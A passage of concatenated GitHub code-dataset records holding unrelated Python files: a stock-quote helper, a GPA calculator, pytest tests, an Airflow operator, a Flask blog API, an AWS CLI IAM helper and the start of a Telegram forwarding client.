ticker = yf.Ticker(ns_parser.s_ticker)\n\n # If price only option, return immediate market price for ticker.\n if ns_parser.price_only:\n print(f\"Price of {ns_parser.s_ticker} {ticker.info['regularMarketPrice']} \\n\")\n return\n\n try:\n quote_df = pd.DataFrame(\n [\n {\n \"Symbol\": ticker.info[\"symbol\"],\n \"Name\": ticker.info[\"shortName\"],\n \"Price\": ticker.info[\"regularMarketPrice\"],\n \"Open\": ticker.info[\"regularMarketOpen\"],\n \"High\": ticker.info[\"dayHigh\"],\n \"Low\": ticker.info[\"dayLow\"],\n \"Previous Close\": ticker.info[\"previousClose\"],\n \"Volume\": ticker.info[\"volume\"],\n \"52 Week High\": ticker.info[\"fiftyTwoWeekHigh\"],\n \"52 Week Low\": ticker.info[\"fiftyTwoWeekLow\"],\n }\n ]\n )\n\n quote_df[\"Change\"] = quote_df[\"Price\"] - quote_df[\"Previous Close\"]\n quote_df[\"Change %\"] = quote_df.apply(\n lambda x: f'{((x[\"Change\"] / x[\"Previous Close\"]) * 100):.2f}%',\n axis=\"columns\",\n )\n for c in [\n \"Price\",\n \"Open\",\n \"High\",\n \"Low\",\n \"Previous Close\",\n \"52 Week High\",\n \"52 Week Low\",\n \"Change\",\n ]:\n quote_df[c] = quote_df[c].apply(lambda x: f\"{x:.2f}\")\n quote_df[\"Volume\"] = quote_df[\"Volume\"].apply(lambda x: f\"{x:,}\")\n\n quote_df = quote_df.set_index(\"Symbol\")\n\n quote_data = transpose(quote_df)\n\n print(\n tabulate(\n quote_data,\n headers=quote_data.columns, # type: ignore\n tablefmt=\"fancy_grid\",\n stralign=\"right\",\n )\n )\n\n except KeyError:\n print(f\"Invalid stock ticker: {ns_parser.s_ticker}\")\n\n print(\"\")\n return\n\n\ndef load_ticker(\n ticker: str, start_date: Union[str, datetime], end_date: Union[str, datetime] = \"\"\n) -> pd.DataFrame:\n \"\"\"Loads a ticker data from Yahoo Finance, adds a data index column data_id and Open-Close High/Low columns.\n\n Parameters\n ----------\n ticker : str\n The stock ticker.\n start_date : Union[str,datetime]\n Start date to load stock ticker data formatted YYYY-MM-DD.\n end_date : Union[str,datetime]\n End date to load stock ticker data formatted YYYY-MM-DD.\n\n Returns\n -------\n DataFrame\n A Panda's data frame with columns Open, High, Low, Close, Adj Close, Volume, date_id, OC-High, OC-Low.\n \"\"\"\n if end_date:\n df_data = yf.download(ticker, start=start_date, end=end_date, progress=False)\n else:\n df_data = yf.download(ticker, start=start_date, progress=False)\n\n df_data[\"date_id\"] = (df_data.index.date - df_data.index.date.min()).astype(\n \"timedelta64[D]\"\n )\n df_data[\"date_id\"] = df_data[\"date_id\"].dt.days + 1\n\n df_data[\"OC_High\"] = df_data[[\"Open\", \"Close\"]].max(axis=1)\n df_data[\"OC_Low\"] = df_data[[\"Open\", \"Close\"]].min(axis=1)\n\n return df_data\n\n\ndef process_candle(df_data: pd.DataFrame) -> pd.DataFrame:\n \"\"\"Process DataFrame into candle style plot\n\n Parameters\n ----------\n df_data : DataFrame\n Stock dataframe.\n\n Returns\n -------\n DataFrame\n A Panda's data frame with columns Open, High, Low, Close, Adj Close, Volume, date_id, OC-High, OC-Low.\n \"\"\"\n df_data[\"date_id\"] = (df_data.index.date - df_data.index.date.min()).astype(\n \"timedelta64[D]\"\n )\n df_data[\"date_id\"] = df_data[\"date_id\"].dt.days + 1\n\n df_data[\"OC_High\"] = df_data[[\"Open\", \"Close\"]].max(axis=1)\n df_data[\"OC_Low\"] = df_data[[\"Open\", \"Close\"]].min(axis=1)\n\n df_data[\"ma20\"] = df_data[\"Close\"].rolling(20).mean().fillna(method=\"bfill\")\n df_data[\"ma50\"] = df_data[\"Close\"].rolling(50).mean().fillna(method=\"bfill\")\n\n return df_data\n\n\ndef find_trendline(\n df_data: pd.DataFrame, y_key: str, high_low: str = \"high\"\n) -> pd.DataFrame:\n \"\"\"Attempts to find a trend line based on y_key column from a given stock ticker data frame.\n\n Parameters\n ----------\n df_data : DataFrame\n The stock ticker data frame with at least date_id, y_key columns.\n\n y_key : str\n Column name to base the trend line on.\n\n high_low: str, optional\n Either \"high\" or \"low\". High is the default.\n\n Returns\n -------\n DataFrame\n If a trend is successfully found,\n An updated Panda's data frame with a trend data {y_key}_trend column.\n If no trend was found,\n An original Panda's data frame\n \"\"\"\n\n for iteration in [3, 4, 5, 6, 7]:\n df_temp = df_data.copy()\n while len(df_temp) > iteration:\n reg = stats.linregress(\n x=df_temp[\"date_id\"],\n y=df_temp[y_key],\n )\n\n if high_low == \"high\":\n df_temp = df_temp.loc[\n df_temp[y_key] > reg[0] * df_temp[\"date_id\"] + reg[1]\n ]\n else:\n df_temp = df_temp.loc[\n df_temp[y_key] < reg[0] * df_temp[\"date_id\"] + reg[1]\n ]\n\n if len(df_temp) > 1:\n break\n\n if len(df_temp) == 1:\n return df_data\n\n reg = stats.linregress(\n x=df_temp[\"date_id\"],\n y=df_temp[y_key],\n )\n\n df_data[f\"{y_key}_trend\"] = reg[0] * df_data[\"date_id\"] + reg[1]\n\n return df_data\n","repo_name":"DidierRLopes/GST-discordbot","sub_path":"gamestonk_terminal/stocks/stocks_helper.py","file_name":"stocks_helper.py","file_ext":"py","file_size_in_byte":20844,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"31513981621","text":"print('Selamat datang di Kalkulator IPK!')\n\n# Menggunakan while loop untuk mengecek apakah jumlah matkul yang diinput sesuai kriteria\n# Apabila kurang dari 0 , maka user harus menginput nilai kembali yang valid\n# Jika matkul nya 0 , maka tidak ada matkul yg diambil dan program langsung berhenti\n# Selebihnya bila > 0 , maka loop berhenti dan lanjut ke statement berikutnya\nwhile True:\n # Menerima input user untuk jumlah matkul\n jumlah_matkul=int(input('Masukkan jumlah mata kuliah: '))\n if jumlah_matkul==0:\n print('Tidak ada mata kuliah yang diambil.')\n exit()\n elif jumlah_matkul<0:\n continue\n else:\n break\n\n# Assign variabel yang akan kita butuhkan untuk perhitungan nanti \njumlah_semua_mutu=0\njumlah_mutu_lulus=0\nsks_lulus=0\nsks_tidak_lulus=0\n\n# Menggunakan for loop sebanyak jumlah matkul yang diambil\nfor loop in range(jumlah_matkul):\n\n # Menerima input user berupa nama matkul dengan formatting untuk menentukan jumlah matkul ke berapa\n # Dan juga menerima input berupa jumlah sks dengan formatting nama matkulnya apa\n nama_matkul=input(f'Masukkan nama mata kuliah ke-{loop+1}: ')\n jumlah_sks=int(input(f'Masukkan jumlah SKS {nama_matkul} : '))\n\n # Menggunakan loop untuk mengecek nilai matkul , kalau kurang dari 0 nilainya tetap di-looping\n # Dan selain itu break dari loop\n while True:\n # Input nilai_matkul dalam bentuk float karena memungkinkan inputan ada koma\n nilai_matkul=float(input('Masukkan nilai yang kamu dapatkan: '))\n if nilai_matkul<0:\n print('Nilai yang kamu masukkan tidak valid')\n continue\n else : \n break\n \n # Menggunakan condition untuk mengonversi nilai matkul menjadi bobot dan\n # Menentukan jumlah sks matkul yang lulus atau tidak sesuai dengan kriteria yang sudah ditentukan\n if 0<=nilai_matkul<40:\n bobot=0.00\n sks_tidak_lulus+=jumlah_sks\n elif 40<=nilai_matkul<55:\n bobot=1.00\n sks_tidak_lulus+=jumlah_sks\n else:\n # Memakai nested condition khusus untuk nilai matkul yang membuat lulus sks ,\n # Supaya bisa menspesifikan mutu hanya untuk jumlah mutu matkul yang lulus\n if 55<=nilai_matkul<60:\n bobot=2.00\n sks_lulus+=jumlah_sks\n elif 60<=nilai_matkul<65:\n bobot=2.30\n sks_lulus+=jumlah_sks\n elif 65<=nilai_matkul<70:\n bobot=2.70\n sks_lulus+=jumlah_sks\n elif 70<=nilai_matkul<75:\n bobot=3.00\n sks_lulus+=jumlah_sks\n elif 75<=nilai_matkul<80:\n bobot=3.30\n sks_lulus+=jumlah_sks\n elif 80<=nilai_matkul<85:\n bobot=3.70\n sks_lulus+=jumlah_sks\n elif nilai_matkul>=85:\n bobot=4.00\n sks_lulus+=jumlah_sks\n # Menjumlahkan total mutu sks yang lulus\n jumlah_mutu_lulus+=bobot*jumlah_sks\n \n # Menjumlahkan total mutu sks yang lulus maupun yang tidak lulus\n mutu=bobot*jumlah_sks\n jumlah_semua_mutu+=mutu\n print()\n\n# Ketika Loop Selesai\n# Menjumlahkan total sks yang diambil dari yg lulus + tidak lulus\ntotal_sks=sks_lulus+sks_tidak_lulus\n\n# Membuat condition jika total semua sks atau total sks lulus tidak 0 \n# Maka dicari IPT atau IPK menggunakan rumus yang ditentukan\n# Tetapi jika 0 , maka IPT atau IPK tetap 0 , dan tidak dimasukkan ke rumus\n# Untuk menghindari terjadinya division by zero error\nIPT,IPK=0,0\nif total_sks!=0:\n IPT=jumlah_semua_mutu/total_sks\nif sks_lulus!=0:\n IPK=jumlah_mutu_lulus/sks_lulus\n\n# Print dengan formatting dan juga kata kata yang telah ditentukan\nprint('Jumlah SKS lulus :' ,sks_lulus ,'/', total_sks)\nprint('Jumlah mutu lulus:', f'{jumlah_mutu_lulus:.2f}' ,'/', f'{jumlah_semua_mutu:.2f}')\nprint('Total IPK kamu adalah' ,f'{IPK:.2f}')\nprint('Total IPT kamu adalah', f'{IPT:.2f}')\n\n","repo_name":"bryan273/DDP1_2021","sub_path":"Lab02 - GPA Calculation/kalkulator_ipk.py","file_name":"kalkulator_ipk.py","file_ext":"py","file_size_in_byte":3867,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"70521742974","text":"#!/usr/bin/env python3\n\n# -- run_menu_update.py --\n# This script fetches new menu data from the sources specified in the configuration.\n# It downloads menus to the files configured in the section 'menu_locations' of the\n# config file.\n# Usage: `python run_menu_update.py [config_file]`\n# \n\nimport sys\nimport json\nfrom menu import menudownload\n\n# use 'config.json' as default config file\nif len(sys.argv) > 1:\n config_file = sys.argv[1]\nelse:\n config_file = \"config.json\"\nwith open(config_file, 'r') as f:\n config = json.load(f)\n\n# download menus\nsources = config.get(\"menu_sources\")\nfor location, file in config.get(\"menu_locations\").items():\n menudownload.download_to_file(file, location, sources)\n","repo_name":"calpt/telegram-bots","sub_path":"tu_mensabot/run_menu_update.py","file_name":"run_menu_update.py","file_ext":"py","file_size_in_byte":711,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"79"} +{"seq_id":"19282823309","text":"import pytest\n\nfrom handpick import pick, Predicate\n\n\nclass TestCollectionHandling:\n def test_collections_included_by_default(self, sample_sequences):\n picked = list(pick(sample_sequences))\n assert picked == [\n [[\"ab\"], b\"cd\", (b\"ef\",)],\n [\"ab\"],\n \"ab\",\n b\"cd\",\n (b\"ef\",),\n b\"ef\",\n (\"3.14\", \"15\"),\n \"3.14\",\n \"15\",\n ]\n\n def test_collections_excluded_optionally(self, sample_sequences):\n picked = list(pick(sample_sequences, collections=False))\n assert picked == [\"ab\", b\"cd\", b\"ef\", \"3.14\", \"15\"]\n\n def test_collections_in_dict_keys_included_by_default(self, sample_subscriptables):\n picked = list(pick(sample_subscriptables, dict_keys=True))\n assert picked == [\n [[\"ab\"], b\"cd\", {(\"ef\",): b\"gh\"}],\n [\"ab\"],\n \"ab\",\n b\"cd\",\n {(\"ef\",): b\"gh\"},\n (\"ef\",),\n \"ef\",\n b\"gh\",\n {\"ij\": \"kl\"},\n \"ij\",\n \"kl\",\n (\"3.14\", \"15\"),\n \"3.14\",\n \"15\",\n ]\n\n def test_collections_in_dict_keys_excluded_optionally(self, sample_subscriptables):\n picked = list(pick(sample_subscriptables, collections=False, dict_keys=True))\n assert picked == [\"ab\", b\"cd\", \"ef\", b\"gh\", \"ij\", \"kl\", \"3.14\", \"15\"]\n\n\nclass TestFunctionsAndPredicates:\n def test_simple_function(self, sample_collections):\n picked = list(pick(sample_collections, lambda s: hasattr(s, \"count\")))\n assert picked == [\n [{\"ab\"}, b\"cd\", {(\"ef\",): b\"gh\"}],\n \"ab\",\n b\"cd\",\n b\"gh\",\n (frozenset({\"3.14\"}), \"15\"),\n \"3.14\",\n \"15\",\n ]\n\n def test_function_raises_error(self, sample_collections):\n with pytest.raises(TypeError):\n list(pick(sample_collections, lambda s: s[1]))\n\n def test_predicate_suppresses_errors(self, sample_collections):\n picked = list(pick(sample_collections, Predicate(lambda s: s[1])))\n assert picked == [\n [{\"ab\"}, b\"cd\", {(\"ef\",): b\"gh\"}],\n \"ab\",\n b\"cd\",\n b\"gh\",\n (frozenset({\"3.14\"}), \"15\"),\n \"3.14\",\n \"15\",\n ]\n\n\nclass TestDictKeyHandling:\n def test_dict_keys_excluded_by_default(self, sample_subscriptables):\n picked = list(pick(sample_subscriptables, lambda t: isinstance(t, tuple)))\n assert picked == [(\"3.14\", \"15\")]\n\n def test_dict_keys_included_optionally(self, sample_subscriptables):\n picked = list(\n pick(sample_subscriptables, lambda t: isinstance(t, tuple), dict_keys=True)\n )\n assert picked == [(\"ef\",), (\"3.14\", \"15\")]\n\n\nclass TestSpecialCases:\n def test_empty_root_yields_nothing(self):\n assert list(pick([])) == []\n\n def test_non_iterable_root_yields_nothing(self):\n assert list(pick(None)) == []\n\n def test_non_callable_predicate_raises_error(self, sample_collections):\n with pytest.raises(TypeError, match=\"predicate must be callable\"):\n list(pick(sample_collections, 42))\n\n def test_omitted_predicate_yields_everything(self):\n assert list(pick([{1: 2}])) == [{1: 2}, 2]\n assert list(pick([{1: 2}], collections=False)) == [2]\n assert list(pick([{1: 2}], dict_keys=True)) == [{1: 2}, 1, 2]\n\n def test_custom_sequence(self, custom_sequence):\n assert list(pick(custom_sequence, bool)) == [1, 2]\n\n def test_custom_sequence_no_predicate(self, custom_sequence):\n assert list(pick(custom_sequence)) == [0, 1, 2]\n\n\nclass TestStringsAndBytesLike:\n @pytest.mark.parametrize(\n \"data, expected\",\n (\n pytest.param([\"foo\"], [\"foo\"], id=\"string\"),\n pytest.param([\"ab\", [\"cd\"]], [\"ab\", [\"cd\"], \"cd\"], id=\"nested\"),\n pytest.param(\"foo\", [], id=\"top-level string\"),\n ),\n )\n def test_strings_not_iterated(self, data, expected):\n assert list(pick(data)) == expected\n\n @pytest.mark.parametrize(\n \"data, expected\",\n (\n pytest.param([b\"foo\"], [b\"foo\"], id=\"bytes\"),\n pytest.param([b\"ab\", [b\"cd\"]], [b\"ab\", [b\"cd\"], b\"cd\"], id=\"nested\"),\n pytest.param(b\"foo\", [], id=\"top-level bytes\"),\n ),\n )\n def test_bytes_like_not_iterated_by_default(self, data, expected):\n assert list(pick(data)) == expected\n\n @pytest.mark.parametrize(\n \"data, expected\",\n (\n pytest.param([b\"foo\"], [b\"foo\", ord(\"f\"), ord(\"o\"), ord(\"o\")], id=\"bytes\"),\n pytest.param(\n [b\"ab\", [b\"cd\"]],\n [b\"ab\", ord(\"a\"), ord(\"b\"), [b\"cd\"], b\"cd\", ord(\"c\"), ord(\"d\")],\n id=\"nested\",\n ),\n pytest.param(bytearray([4, 2]), [4, 2], id=\"top-level bytes\"),\n ),\n )\n def test_bytes_like_iterated_optionally(self, data, expected):\n assert list(pick(data, bytes_like=True)) == expected\n\n def test_bytes_like_not_picked_but_iterated_optionally(self):\n data = [\"foo\", 42, b\"bar\"]\n picked = list(pick(data, collections=False, bytes_like=True))\n assert picked == [\"foo\", 42, ord(\"b\"), ord(\"a\"), ord(\"r\")]\n","repo_name":"mportesdev/handpick","sub_path":"tests/test_pick.py","file_name":"test_pick.py","file_ext":"py","file_size_in_byte":5273,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"79"} +{"seq_id":"18889919294","text":"def solution (a, b, queries):\n\tprint(f'a = {a}, b = {b}, queries = {queries}\\n')\n\n\tres = []\n\n\tfor query in queries:\n\t\tprint(f'query = {query}', end='\\t')\n\t\tif query[0] == 0:\n\t\t\ta[query[1]] = query[2]\n\t\t\tprint(f'handled 0: a = {a}, b = {b}')\n\t\telif query[0] == 1:\n\t\t\tcomplements = [query[1] - n for n in a]\n\t\t\tmatches = [b.count(c) for c in complements]\n\t\t\tres += [sum(matches)]\n\t\t\tprint(f'\\thandled 1: res = {res}')\n\n\tprint('')\n\treturn(res)\n\n\nif __name__ == '__main__':\n\tprint('')\n\ta = [3,4]\n\tb = [1,2,3]\n\tqueries = [[1,5], [0,0,1], [1,5]]\n\tprint(f\"solution() = {solution(a, b, queries)}\\n\")\n\n\tprint('')\n\ta = [2,3]\n\tb = [1,2,2]\n\tqueries = [[1,4], [0,0,3], [1,5]]\n\tprint(f\"solution() = {solution(a, b, queries)}\\n\")\n\n","repo_name":"arulkumar-c/learn","sub_path":"python/array-queries.py","file_name":"array-queries.py","file_ext":"py","file_size_in_byte":716,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15860449360","text":"from airflow.hooks.postgres_hook import PostgresHook\nfrom airflow.models import BaseOperator\nfrom airflow.utils.decorators import apply_defaults\n\nclass LoadDimensionOperator(BaseOperator):\n\n ui_color = '#80BD9E'\n\n @apply_defaults\n def __init__(self,\n redshift_conn_id='',\n table='',\n sql='',\n *args, **kwargs):\n \"\"\"\n Initialize Redshift, dimension table, and SQL insert statement\n \n Keyword Arguments:\n redshift_conn_id -- Redshift connection ID configured in Airflow/admin/connection UI (str)\n table -- Dimension table name (str)\n sql -- SQL insert command to execute on dimension table (str)\n \"\"\"\n super(LoadDimensionOperator, self).__init__(*args, **kwargs)\n self.redshift_conn_id = redshift_conn_id\n self.table = table\n self.sql = sql\n\n def execute(self, context, delete_existing_data=False):\n \"\"\"\n Loads data from staging table(s) to dimension table\n \n Keyword Arguments:\n delete_existing_data -- Deletes existing data from table if True (bool)\n \"\"\"\n redshift = PostgresHook(self.redshift_conn_id)\n\n #Deletes existing data from table if True\n if delete_existing_data == True:\n self.log.info(f'Deleting data in {self.table} table')\n redshift.run(f'DELETE FROM {self.table}')\n else:\n self.log.info(f'Loading data from staging table(s) to {self.table} table')\n\n self.log.info(f'LoadDimensionOperator loading {self.table} table')\n redshift.run(self.sql)\n self.log.info(f'LoadDimensionOperator loaded {self.table} table')\n \n \n","repo_name":"marshall7m/sparkify-aws-airflow","sub_path":"plugins/operators/load_dimension.py","file_name":"load_dimension.py","file_ext":"py","file_size_in_byte":1724,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"33963947448","text":"\n\n# -*- coding: utf-8 -*-\n\"\"\"\nNeural Net 계층 test 직접연습\n\n역전파 고려하는 버전 \n\"\"\"\n\nimport numpy as np \n\n\nclass Sigmoid:\n def __init__(self):\n self.params = [] \n self.grads = [], []\n self.out = None \n \n def forward(self, x):\n out = 1 / (1 + np.exp(-x))\n self.out = out \n return out\n \n def backward(self, dout):\n return dout * (1.0 - self.out) * self.out\n \n \n\nclass Affine: \n def __init__(self, W,b):\n self.params = [W,b]\n self.grads = [np.zeros_like(w), np.zeros_like(b)]\n self.x = None \n \n def forward(self, x):\n W, b = self.params \n out = np.matmul(x,W) + b\n self.x = x\n return out \n def backward(self, dout):\n W, b = self.params\n dx = np.matmul(dout, W.T)\n dW = np.matmul(self.x.T, dout)\n db = np.sum(dout, axis=0)\n \n self.grads[0][...] = dW \n self.grads[1][...] = db\n return dx\n \n\n\n\n\n\n# 학습(Train)의 과정: \n#기울기를 구한 뒤, -> 가중치를 갱신해준다 : SGD, [Momentum, AdaGrad, Adam 등]\n#오차역전법(Error Backpropagation)에서는 가장 큰 손실을 가리키는 기울기를 얻는다 \n#기울기와 반대방향으로 갱신시 오차를 줄일 수 있다.\n\n\nclass SGD: \n def __init__(self, lr=0.01):\n self.lr = lr \n \n \n def update(self, params, grads):\n for i in range(len(params)):\n params[i] -= self.lr * grads[i]\n \n\n\n'''\n\n\nx = np.random.randn(10,2)\n\n\nw1 = np.random.randn(2,4)\nb1 = np.random.randn(4)\n\n\nw2 = np.random.randn(4,3)\nb2 = np.random.randn(3)\n\n\nL1 = Affine(w1,b1)\nL2 = Sigmoid()\nL3 = Affine(w2,b2)\n\n\ny = L1.forward(x)\nz = L2.forward(y)\no = L3.forward(z)\n\n\n\n'''\n\n# 좀더 간결하게 위의 과정을 만들기 -> 사용할 계층을 모두 단일클래스화 \n\nclass TwoLayerNet:\n def __init__(self, input_size, hidden_size, output_size):\n i, h, o = input_size, hidden_size, output_size\n \n W1 = np.random.randn(i,h)\n b1 = np.random.randn(h)\n W2 = np.random.randn(h,o)\n b2 = np.random.randn(o)\n \n\n self.layers = [Affine(W1,b1), Sigmoid(), Affine(W2,b2)]\n \n self.params = []\n for layer in self.layers:\n self.params += layer.params # a = [1,2] a+=[3,4] = [1,2,3,4]\n \n \n def predict(self, x):\n for layer in self.layers:\n x = layer.forward(x)\n return x \n \n\n \nx = np.random.randn(10,2)\nnet = TwoLayerNet(2,4,3)\n\no = net.predict(x)\n","repo_name":"purang2/deepLearning-practice","sub_path":"밑바닥 2/ch1. NeuralNetwork/3. NN with Error-Backprop.py","file_name":"3. NN with Error-Backprop.py","file_ext":"py","file_size_in_byte":2584,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"79"} +{"seq_id":"15557646657","text":"from flask import jsonify, current_app, request, g\nfrom flask_login import login_required\nfrom . import api\nfrom ..models import *\nfrom ..utils import *\nfrom .. import *\n\n\"\"\"\napi 路由:\n get_posts(): 返回所有博客文章\n get_post(id, url): 返回指定 id 的文章\n get_pages(): 返回所有页面\n get_page(id): 返回指定页面\n get_tags(): 返回所有博客标签\n get_tag_posts(tag): 返回指定标签的文章\n get_categories(): 返回所有博客分类\n get_category_posts(cate): 返回指定分类的文章\n get_shuos(): 返回所有说说\n\"\"\"\n\n\n@api.route('/posts')\n@cache.cached(60*60*24,query_string=True)\ndef get_posts():\n page = request.args.get('page', 1, type=int)\n pagination = Post.query.filter_by(draft=False)\\\n .order_by(Post.timestamp.desc()).paginate(\n page, per_page=current_app.config['POSTS_PER_PAGE'],\n error_out=False)\n posts = pagination.items\n prev = None\n if pagination.has_prev:\n prev = url_for('api.get_posts', page=page - 1, _external=True)\n next = None\n if pagination.has_next:\n next = url_for('api.get_posts', page=page + 1, _external=True)\n\n return jsonify({\n 'posts': [post.to_json() for post in posts],\n 'prev': prev,\n 'next': next,\n 'count': pagination.total\n })\n\n\n@api.route('/post/')\n@cache.cached(60*60*24,query_string=True)\ndef get_post(id):\n post = Post.query.filter_by(id=id).first()\n if post:\n return jsonify({\n 'post': post.to_json(),\n 'body': post.body.split('')[0],\n 'html': post.body_to_html.split('')[0]\n })\n\n return jsonify({'msg': '没有信息...'})\n\n\n# post请求\n@api.route('/post', methods=['POST'])\n@login_required\n@admin_required\ndef new_post():\n post = Post.from_json(request.json)\n db.session.add(post)\n db.session.commit()\n return jsonify(post.to_json()), 201, {'Location': url_for('api.get_post', id=post.id, _external=True)}\n\n\n# put请求\n@api.route('/posts/', methods=['PUT'])\n@login_required\n@admin_required\ndef edit_post(id):\n post = Post.query.get_or_404(id)\n\n post.title = request.json.get('title', post.title)\n post.body = request.json.get('body', post.body)\n db.session.add(post)\n return jsonify(post.to_json())\n\n\n@api.route('/pages')\n@cache.cached(60*60*24,query_string=True)\ndef get_pages():\n pages = Page.query.order_by(Page.id.desc()).all()\n return jsonify({\n 'pages': [page.to_json() for page in pages],\n 'count': len(pages)\n })\n\n\n@api.route('/page/')\n@cache.cached(60*60*24,query_string=True)\ndef get_page(id):\n page = Page.query.get_or_404(id)\n if page:\n return jsonify({\n 'page': page.to_json(),\n 'body': page.body,\n 'html': page.body_to_html\n })\n\n return jsonify({'msg': '没有信息...'})\n\n\n@api.route('/tags')\n@cache.cached(60*60*24,query_string=True)\ndef get_tags():\n tags = Tag.query.all()\n\n return jsonify({\n 'tags': [tag.to_json() for tag in tags],\n 'count': len(tags)\n })\n\n\n@api.route('/tag/')\n@cache.cached(60*60*24,query_string=True)\ndef get_tag_posts(tag):\n tag = Tag.query.filter_by(tag=tag).first()\n if tag:\n posts = [p for p in Post.query.filter_by(draft=False).all() if p.tag_in_post(tag.tag)]\n return jsonify({\n 'posts': [post.to_json() for post in posts],\n 'count': len(posts)\n })\n\n return jsonify({'msg': '没有信息...'})\n\n\n@api.route('/categories')\n@cache.cached(60*60*24,query_string=True)\ndef get_categories():\n categories = Category.query.all()\n\n return jsonify({\n 'categories': [category.to_json() for category in categories],\n 'count': len(categories)\n })\n\n\n@api.route('/category/')\n@cache.cached(60*60*24,query_string=True)\ndef get_category_posts(category):\n category = Category.query.filter_by(category=category).first()\n if category:\n posts = Post.query.filter_by(category=category).all()\n return jsonify({\n 'posts': [post.to_json() for post in posts],\n 'count': len(posts)\n })\n\n return jsonify({'msg': '没有信息...'})\n\n\n@api.route('/shuos')\n@cache.cached(60*60*24,query_string=True)\ndef get_shuos():\n shuos = Shuoshuo.query.order_by(Shuoshuo.timestamp.desc()).all()\n\n return jsonify({\n 'shuoshuo': [shuo.to_json() for shuo in shuos],\n 'count': len(shuos)\n })\n\n\n@api.route('/comments/post/')\n@cache.cached(60*60*24,query_string=True)\ndef get_post_comments(id):\n post = Post.query.filter_by(id=id).first()\n if post:\n comments = Comment.query.filter_by(post=post).all()\n return jsonify({'comments': [comment.to_json() for comment in comments]})\n\n return jsonify({'msg': '没有信息...'})\n\n\n@api.route('/comments/page/')\n@cache.cached(60*60*24,query_string=True)\ndef get_page_comments(id):\n page = Page.query.get_or_404(id)\n if page:\n comments = Comment.query.filter_by(page=page).all()\n return jsonify({'comments': [comment.to_json() for comment in comments]})\n\n return jsonify({'msg': '没有信息...'})\n\n# post views\n@api.route('/view//', methods=['GET'])\ndef views(type, id):\n \"\"\"浏览量\"\"\"\n view = View.query.filter_by(type=type, relationship_id=id).first()\n ckk='read_'+type\n old_cookie=request.cookies.get(ckk)\n if not view:\n view = View(type=type, count=1, relationship_id=id)\n db.session.add(view)\n db.session.commit()\n resp = jsonify(count=1)\n if old_cookie:\n if str(id) in old_cookie.split('-'):\n cookie=old_cookie\n else:\n cookie=old_cookie+'-'+str(id)\n else:\n cookie=str(id)\n resp.set_cookie(ckk, cookie, max_age=1 * 24 * 60 * 60)\n return resp\n else:\n if old_cookie:\n if str(id) in old_cookie.split('-'):\n cookie=old_cookie\n else:\n cookie=old_cookie+'-'+str(id)\n view.count += 1\n db.session.add(view)\n db.session.commit()\n else:\n cookie=str(id)\n view.count += 1\n db.session.add(view)\n db.session.commit()\n resp = jsonify(count=view.count)\n resp.set_cookie(ckk, cookie, max_age=1 * 24 * 60 * 60)\n return resp\n","repo_name":"abbey2023/ABlog","sub_path":"app/api/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":6449,"program_lang":"python","lang":"en","doc_type":"code","stars":46,"dataset":"github-code","pt":"79"} +{"seq_id":"15987331211","text":"import json\n\n\nclass IAM(object):\n\n def __init__(self, iam_client):\n self.iam_client = iam_client\n\n def check_if_role_exists(self, role_name):\n \"\"\"Method to verify if a particular role exists\"\"\"\n try:\n self.iam_client.get_role(RoleName=role_name)\n except self.iam_client.exceptions.NoSuchEntityException:\n return False\n return True\n\n def check_if_policy_exists(self, policy_arn):\n \"\"\"Method to verify if a particular policy exists\"\"\"\n try:\n self.iam_client.get_policy(PolicyArn=policy_arn)\n except self.iam_client.exceptions.NoSuchEntityException:\n return False\n return True\n\n def attach_policy_to_role(self, policy_arn, role_name):\n \"\"\"Method to attach LifecyclePolicy to role specified by role_name\"\"\"\n return self.iam_client.attach_role_policy(\n PolicyArn=policy_arn,\n RoleName=role_name\n )\n\n def create_role_with_trust_policy(self, role_name, assume_role_policy):\n \"\"\"Method to create role with a given role name\n and assume_role_policy\n \"\"\"\n return self.iam_client.create_role(\n RoleName=role_name,\n AssumeRolePolicyDocument=json.dumps(assume_role_policy))\n\n def get_policy(self, arn):\n \"\"\"Method to get the Policy for a particular ARN\n This is used to display the policy contents to the user\n \"\"\"\n pol_det = self.iam_client.get_policy(PolicyArn=arn)\n policy_version_details = self.iam_client.get_policy_version(\n PolicyArn=arn,\n VersionId=pol_det.get(\"Policy\", {}).get(\"DefaultVersionId\", \"\")\n )\n return policy_version_details\\\n .get(\"PolicyVersion\", {})\\\n .get(\"Document\", {})\n","repo_name":"aws/aws-cli","sub_path":"awscli/customizations/dlm/iam.py","file_name":"iam.py","file_ext":"py","file_size_in_byte":1798,"program_lang":"python","lang":"en","doc_type":"code","stars":14456,"dataset":"github-code","pt":"79"} +{"seq_id":"54026634563","text":"from telethon import TelegramClient, events, types, utils\nfrom telethon.tl.patched import Message\nfrom telethon.tl.custom.messagebutton import MessageButton\nfrom telethon.tl.types.messages import BotCallbackAnswer\nfrom telethon.tl.functions.account import UpdateStatusRequest\n\nimport asyncio\nimport logging\nimport tracemalloc\nimport os\nimport sqlite3\nimport re\nimport threading\nimport tkinter as tk\n\n#loop = asyncio.get_event_loop()\nscriptName = str(os.path.basename(__file__).split(\".\")[0])\nprint(\"Starting\", scriptName)\napi_id = 6\napi_hash = \"eb06d4abfb49dc3eeb1aeb98ae0f581e\"\napp_version = '5.11.0 (1709)'\ndevice_model = 'SM-M205FN'\nsystem_version = 'SDK 29'\n\ntracemalloc.start()\nlogging.basicConfig(format='%(asctime)s - %(name)s - %(levelname)s - %(message)s',\n level=logging.WARN)\nlogger = logging.getLogger(__name__)\n\nclient_1 = TelegramClient(\"client_1_\" + scriptName, api_id, api_hash, app_version=app_version,\n device_model=device_model, system_version=system_version)\ndbConnection = sqlite3.connect(f\"data_{scriptName}.db\", isolation_level=None, check_same_thread=False)\n\nignore_entities = []\n\n# from_to = {-1001389557656: [-1001409636268, -1001412033708], -1001190739025: [-1001409636268, -1001412033708],\n# -1001277274378: [-1001409636268, -1001412033708]}\nfrom_to = {-1001389557656: [-1001409636268], 